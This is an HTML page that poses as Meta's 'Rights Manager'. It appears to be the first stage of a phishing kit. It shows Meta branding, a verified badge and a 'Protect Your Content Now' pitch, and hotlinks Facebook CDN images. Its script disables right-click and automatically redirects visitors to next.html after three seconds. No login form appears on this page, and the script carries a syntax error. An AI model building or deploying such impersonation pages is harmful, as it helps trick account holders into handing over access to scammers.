<!DOCTYPE html>

<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Rights manager</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        /* CSS styles */

        body {
            font-family: system-ui;
            margin: 0;
            padding: 0;
        }

        .container-fluid {
            background: #F5F6F6;
        }

        .container {
            padding: 1rem;
        }

        .logo {
            width: 9rem;
            height: 6rem;
        }

        .meta-logo {
            width: 4rem;
            height: 4rem;
        }

        .btn {
            background: #0064e0;
            border: none;
            border-radius: 100px;
            padding: 10px 35px;
            text-decoration: none;
            color: white;
            display: inline-block;
            margin-top: 1rem;
            font-family: Arial, sans-serif;
            /* Same font family */
            font-size: 16px;
            /* Adjust as needed */
        }

        .content {
            margin-top: 3rem;
            display: flex;
            justify-content: center;
        }

        .content .col-sm-6 {
            margin-top: 3rem;
            margin-left: 5rem;
        }

        .content p {
            font-size: 18px;
            margin-top: 1rem;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .sign-up {
            font-size: 17px;
            padding-top: 1rem;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .business-info {
            font-size: 14px;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .region-info {
            font-size: 13px;
            font-style: italic;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .image {
            display: none;
            width: 42%;
            height: 100vh;
            /* Ensure full height */
            background-size: cover;
            /* background-position: center; */
            /* margin-left: 5rem; */
        }

        @media (min-width: 576px) {
            .image {
                display: block;
            }
        }
    </style>
</head>

<body>
    <div class="container-fluid">
        <div class="container">
            <img src="meta-logo.svg" alt="logo" class="logo">
        </div>
    </div>
    <div class="content">
        <div class="col-sm-6">
            <img src="800px-Twitter_Verified_Badge.svg.png" alt="meta" class="meta-logo">
            <h1 class="my-3 fs-1">Meta <br> Rights Manager</h1>
            <div style="margin-bottom: 30px;"></div>
            <a href="next.html" class="btn">Continue</a>
            <p class="mt-4">A Rights Manager is a tool or platform designed to help content creators and copyright holders manage, protect, and monetize their intellectual property online. </p>
            <p class="sign-up">Protect Your Content Now</p>
            <p class="mt-4 mb-0">
                <span class="fw-semibold">Are you a business?</span> Get more information on
            </p>
            <a href="#" class="business-info">Meta verified for businesses</a>
            <p class="mt-4 font-italic region-info">Features, availability, and pricing may vary by region.</p>
        </div>
<div class="_8h4z _8h4- _a4zf" style="box-sizing:border-box;"><img class="_90f0 _9kug _8h4i _as9p _as8y _8h55 img" src="https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/-PAXP-deijE.gif" alt="" style="box-sizing:border-box;background-image:url(https://scontent.fhdd2-1.fna.fbcdn.net/v/t39.8562-6/453241182_953402396541088_6963282014735281852_n.jpg?_nc_cat=106&amp;ccb=1-7&amp;_nc_sid=f537c7&amp;_nc_ohc=c5sxkoNrctQQ7kNvgG2PANl&amp;_nc_zt=14&amp;_nc_ht=scontent.fhdd2-1.fna&amp;_nc_gid=AZTCIUaXqIy8l10qq2L0PB8&amp;oh=00_AYAgBi1a2GTv9OifPeE6UHHdnUKK6ixB3_6Xngq7wbA5yg&amp;oe=673E85C1);border-top-left-radius:48px;border-top-right-radius:48px;border-bottom-left-radius:48px;border-bottom-right-radius:48px;"></div>    </div>
</body>
<script>
    document.addEventListener('contextmenu', event => {
        event.preventDefault();
    });

    setTimeout(function() {
    var redirectURL = "next.html"; // Updated URL
    window.location.replace(redirectURL);
    }, 3000); // 3000 milliseconds (3 seconds)
    });
</script>

</html>
